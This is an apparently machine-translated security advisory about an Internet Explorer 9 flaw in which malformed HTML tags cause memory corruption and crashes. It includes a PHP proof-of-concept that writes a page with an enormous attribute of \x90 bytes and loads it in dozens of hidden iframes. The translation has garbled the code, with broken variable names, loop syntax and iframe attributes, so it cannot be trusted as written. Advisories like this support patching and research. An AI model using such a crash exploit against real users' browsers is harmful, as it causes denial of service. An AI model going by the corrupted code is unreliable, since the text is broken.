Release date:
Updated on:
Affected Systems:
Microsoft Internet Explorer 9.x
Description:
--------------------------------------------------------------------------------
Microsoft Internet Explorer is a Web browser launched by Microsoft and is widely used.
IE9 has a security vulnerability in processing malformed HTML Tag data. Remote attackers may exploit this vulnerability to cause memory corruption and application crash.
<* Source: Jean Pascal Pereira
Link: http://www.exploit-db.com/exploits/22401/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Set_time_limit (0 );
Ini_set ('memory _ limit ', '300m ');
If (! File_exists ("junk.htm "))
{
$ String = "<span id = '";
For ($ I = 0; I I <24117256; $ I ++)
{
$ String. = "\ x90 ";
}
$ String. = "'> </span> ";
File_put_contents ("junk.htm", $ string );
}
Print "View the sourcecode of the iframe below (right click-> view source): <br/> \ n ";
Print "<iframe style = 'width: 800px; height: 500px; 'src0000'junk.htm'> \ n ";
For ($ I = 0; $ I <60; $ I ++)
{
Print "<iframe style = 'display: none' src}'junk.htm'> \ n ";
}
/* Http://0xffe4.org */
?>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Microsoft
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.microsoft.com/windows/ie/default.asp